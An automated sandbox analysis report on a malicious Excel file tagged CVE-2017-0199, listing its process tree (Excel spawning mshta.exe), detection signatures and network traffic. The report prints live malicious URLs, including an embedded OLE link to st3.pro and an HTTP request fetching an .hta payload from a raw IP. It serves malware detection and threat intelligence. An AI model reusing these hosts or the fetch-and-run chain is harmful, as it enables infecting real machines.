Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Nouvelle_commande9353834.xls

Overview

General Information

Sample name:Nouvelle_commande9353834.xls
Analysis ID:1634260
MD5:94bf3cf5f61e340e9a21f8547ed0cacb
SHA1:abc3bdfcbda5c5078969fb016be2fec91cdbd5d5
SHA256:be19f617f8f44ad0c75a580d529a2342e50469539ecd33aa6ac782050043128c
Tags:CVE-2017-0199xlsuser-abuse_ch
Infos:

Detection

Score:60
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Sigma detected: Suspicious Microsoft Office Child Process
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

  • System is w11x64_office
  • EXCEL.EXE (PID: 7496 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
    • mshta.exe (PID: 2876 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 36D15DDE6D71802D9588CC0D48EDF8EA)
    • splwow64.exe (PID: 7004 cmdline: C:\Windows\splwow64.exe 12288 MD5: AF4A7EBF6114EE9E6FBCC910EC3C96E6)
  • EXCEL.EXE (PID: 6228 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Nouvelle_commande9353834.xls" MD5: F9F7B6C42211B06E7AC3E4B60AA8FB77)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 7496, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 2876, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 88.221.110.67, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7496, Protocol: tcp, SourceIp: 192.168.2.25, SourceIsIpv6: false, SourcePort: 49742
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.25, DestinationIsIpv6: false, DestinationPort: 49742, EventID: 3, Image: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7496, Protocol: tcp, SourceIp: 88.221.110.67, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Nouvelle_commande9353834.xlsVirustotal: Detection: 25%Perma Link
Source: Nouvelle_commande9353834.xlsReversingLabs: Detection: 15%
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior

Software Vulnerabilities

barindex
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
Source: global trafficDNS query: name: st3.pro
Source: global trafficTCP traffic: 192.168.2.25:49762 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.25:49763 -> 23.95.235.28:80
Source: global trafficTCP traffic: 192.168.2.25:49742 -> 88.221.110.67:443
Source: global trafficTCP traffic: 192.168.2.25:49742 -> 88.221.110.67:443
Source: global trafficTCP traffic: 192.168.2.25:49743 -> 52.123.129.14:443
Source: global trafficTCP traffic: 192.168.2.25:49742 -> 88.221.110.67:443
Source: global trafficTCP traffic: 192.168.2.25:49743 -> 52.123.129.14:443
Source: global trafficTCP traffic: 192.168.2.25:49743 -> 52.123.129.14:443
Source: global trafficTCP traffic: 192.168.2.25:49743 -> 52.123.129.14:443
Source: global trafficTCP traffic: 192.168.2.25:49743 -> 52.123.129.14:443
Source: global trafficTCP traffic: 192.168.2.25:49742 -> 88.221.110.67:443
Source: global trafficTCP traffic: 192.168.2.25:49742 -> 88.221.110.67:443
Source: global trafficTCP traffic: 192.168.2.25:49742 -> 88.221.110.67:443
Source: global trafficTCP traffic: 192.168.2.25:49762 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.25:49762 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.25:49762 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.25:49762 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.25:49762 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.25:49762 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.25:49762 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.25:49762 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.25:49762 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.25:49762 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.25:49762 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.25:49762 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.25:49762 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.25:49742 -> 88.221.110.67:443
Source: global trafficTCP traffic: 88.221.110.67:443 -> 192.168.2.25:49742
Source: global trafficTCP traffic: 192.168.2.25:49742 -> 88.221.110.67:443
Source: global trafficTCP traffic: 192.168.2.25:49743 -> 52.123.129.14:443
Source: global trafficTCP traffic: 52.123.129.14:443 -> 192.168.2.25:49743
Source: global trafficTCP traffic: 192.168.2.25:49742 -> 88.221.110.67:443
Source: global trafficTCP traffic: 88.221.110.67:443 -> 192.168.2.25:49742
Source: global trafficTCP traffic: 192.168.2.25:49743 -> 52.123.129.14:443
Source: global trafficTCP traffic: 192.168.2.25:49743 -> 52.123.129.14:443
Source: global trafficTCP traffic: 52.123.129.14:443 -> 192.168.2.25:49743
Source: global trafficTCP traffic: 52.123.129.14:443 -> 192.168.2.25:49743
Source: global trafficTCP traffic: 192.168.2.25:49743 -> 52.123.129.14:443
Source: global trafficTCP traffic: 192.168.2.25:49743 -> 52.123.129.14:443
Source: global trafficTCP traffic: 52.123.129.14:443 -> 192.168.2.25:49743
Source: global trafficTCP traffic: 88.221.110.67:443 -> 192.168.2.25:49742
Source: global trafficTCP traffic: 192.168.2.25:49742 -> 88.221.110.67:443
Source: global trafficTCP traffic: 192.168.2.25:49742 -> 88.221.110.67:443
Source: global trafficTCP traffic: 192.168.2.25:49742 -> 88.221.110.67:443
Source: global trafficTCP traffic: 88.221.110.67:443 -> 192.168.2.25:49742
Source: global trafficTCP traffic: 192.168.2.25:49762 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.25:49762
Source: global trafficTCP traffic: 192.168.2.25:49762 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.25:49762 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.25:49762
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.25:49762
Source: global trafficTCP traffic: 192.168.2.25:49762 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.25:49762 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.25:49762
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.25:49762
Source: global trafficTCP traffic: 192.168.2.25:49762 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.25:49762 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.25:49762
Source: global trafficTCP traffic: 192.168.2.25:49762 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.25:49762
Source: global trafficTCP traffic: 192.168.2.25:49762 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.25:49762 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.25:49762
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.25:49762
Source: global trafficTCP traffic: 192.168.2.25:49762 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.25:49762
Source: global trafficTCP traffic: 192.168.2.25:49762 -> 5.161.200.29:443
Source: global trafficTCP traffic: 192.168.2.25:49762 -> 5.161.200.29:443
Source: global trafficTCP traffic: 5.161.200.29:443 -> 192.168.2.25:49762
Source: global trafficTCP traffic: 192.168.2.25:49763 -> 23.95.235.28:80
Source: global trafficTCP traffic: 23.95.235.28:80 -> 192.168.2.25:49763
Source: global trafficTCP traffic: 192.168.2.25:49763 -> 23.95.235.28:80
Source: global trafficTCP traffic: 192.168.2.25:49763 -> 23.95.235.28:80
Source: global trafficTCP traffic: 23.95.235.28:80 -> 192.168.2.25:49763
Source: global trafficTCP traffic: 23.95.235.28:80 -> 192.168.2.25:49763
Source: global trafficTCP traffic: 23.95.235.28:80 -> 192.168.2.25:49763
Source: global trafficTCP traffic: 23.95.235.28:80 -> 192.168.2.25:49763
Source: global trafficTCP traffic: 23.95.235.28:80 -> 192.168.2.25:49763
Source: global trafficTCP traffic: 23.95.235.28:80 -> 192.168.2.25:49763
Source: global trafficTCP traffic: 23.95.235.28:80 -> 192.168.2.25:49763
Source: global trafficTCP traffic: 23.95.235.28:80 -> 192.168.2.25:49763
Source: global trafficTCP traffic: 23.95.235.28:80 -> 192.168.2.25:49763
Source: global trafficTCP traffic: 23.95.235.28:80 -> 192.168.2.25:49763
Source: global trafficTCP traffic: 23.95.235.28:80 -> 192.168.2.25:49763
Source: global trafficTCP traffic: 192.168.2.25:49763 -> 23.95.235.28:80
Source: global trafficTCP traffic: 192.168.2.25:49763 -> 23.95.235.28:80
Source: global trafficTCP traffic: 192.168.2.25:49763 -> 23.95.235.28:80
Source: global trafficTCP traffic: 192.168.2.25:49763 -> 23.95.235.28:80
Source: global trafficTCP traffic: 192.168.2.25:49763 -> 23.95.235.28:80
Source: global trafficTCP traffic: 192.168.2.25:49763 -> 23.95.235.28:80
Source: global trafficTCP traffic: 192.168.2.25:49763 -> 23.95.235.28:80
Source: global trafficTCP traffic: 23.95.235.28:80 -> 192.168.2.25:49763
Source: global trafficTCP traffic: 23.95.235.28:80 -> 192.168.2.25:49763
Source: global trafficTCP traffic: 192.168.2.25:49763 -> 23.95.235.28:80
Source: global trafficTCP traffic: 23.95.235.28:80 -> 192.168.2.25:49763
Source: global trafficTCP traffic: 192.168.2.25:49763 -> 23.95.235.28:80
Source: global trafficTCP traffic: 192.168.2.25:49763 -> 23.95.235.28:80
Source: global trafficTCP traffic: 192.168.2.25:49763 -> 23.95.235.28:80
Source: Joe Sandbox ViewIP Address: 52.123.129.14 52.123.129.14
Source: Joe Sandbox ViewIP Address: 5.161.200.29 5.161.200.29
Source: global trafficHTTP traffic detected: GET /DXMg6tw?&celeste=spiritual&washer=modern&shape HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: st3.proConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/vn/v/kissingwithbestexperiencedgirlfriendonhereformenice.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 23.95.235.28
Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknownTCP traffic detected without corresponding DNS query: 23.95.235.28
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /DXMg6tw?&celeste=spiritual&washer=modern&shape HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: st3.proConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/vn/v/kissingwithbestexperiencedgirlfriendonhereformenice.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 23.95.235.28
Source: global trafficDNS traffic detected: DNS query: st3.pro
Source: Primary1741638267372321100_F9A78B59-C4EB-4A71-822C-78B836EB7BC5.log.0.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.40/flatfontassets.pkg
Source: Primary1741638345538717900_83EB67AA-C6F5-4D55-96DA-571528C13B3B.log.13.drString found in binary or memory: https://res.cdn.office.net/mro1cdnstorage/fonts/prod/4.41/flatfontassets.pkg
Source: Nouvelle_commande9353834.xls, EF740000.0.drString found in binary or memory: https://st3.pro/DXMg6tw?&celeste=spiritual&washer=modern&shape
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443

System Summary

barindex
Source: Nouvelle_commande9353834.xlsOLE: Microsoft Excel 2007+
Source: EF740000.0.drOLE: Microsoft Excel 2007+
Source: Nouvelle_commande9353834.xlsOLE indicator, VBA macros: true
Source: Nouvelle_commande9353834.xlsStream path 'MBD003FE746/\x1Ole' : https://st3.pro/DXMg6tw?&celeste=spiritual&washer=modern&shapePl"`[eb~P:C%SpN!kCcYPYQYAskHeL0vOBYwbDdiqiTKerHS7w2rYvEx4zgFVXELNfHDsLqoXYG3S4GWU5oL58hvMQ036HTfzW0hUXmMj0O4L6hhlmWxOEkJk7UQbonQIWzK5TajPxJ2s5WQe0VE2D621WQmmDwFXkYttXVZ9QuAt2IQi6E7q7DIvNNAkXPromOha6IXutKOx4cciibEPaOOLv5FVaLMF<6GQ|
Source: EF740000.0.drStream path 'MBD003FE746/\x1Ole' : https://st3.pro/DXMg6tw?&celeste=spiritual&washer=modern&shapePl"`[eb~P:C%SpN!kCcYPYQYAskHeL0vOBYwbDdiqiTKerHS7w2rYvEx4zgFVXELNfHDsLqoXYG3S4GWU5oL58hvMQ036HTfzW0hUXmMj0O4L6hhlmWxOEkJk7UQbonQIWzK5TajPxJ2s5WQe0VE2D621WQmmDwFXkYttXVZ9QuAt2IQi6E7q7DIvNNAkXPromOha6IXutKOx4cciibEPaOOLv5FVaLMF<6GQ|
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal60.expl.winXLS@6/13@1/4
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\EF740000Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{F9A78B59-C4EB-4A71-822C-78B836EB7BC5} - OProcSessId.datJump to behavior
Source: Nouvelle_commande9353834.xlsOLE indicator, Workbook stream: true
Source: EF740000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Nouvelle_commande9353834.xlsVirustotal: Detection: 25%
Source: Nouvelle_commande9353834.xlsReversingLabs: Detection: 15%
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Nouvelle_commande9353834.xls"
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: c2r64.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: Nouvelle_commande9353834.xlsStatic file information: File size 1197568 > 1048576
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: EF740000.0.drInitial sample: OLE indicators vbamacros = False
Source: Nouvelle_commande9353834.xlsInitial sample: OLE indicators encrypted = True
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
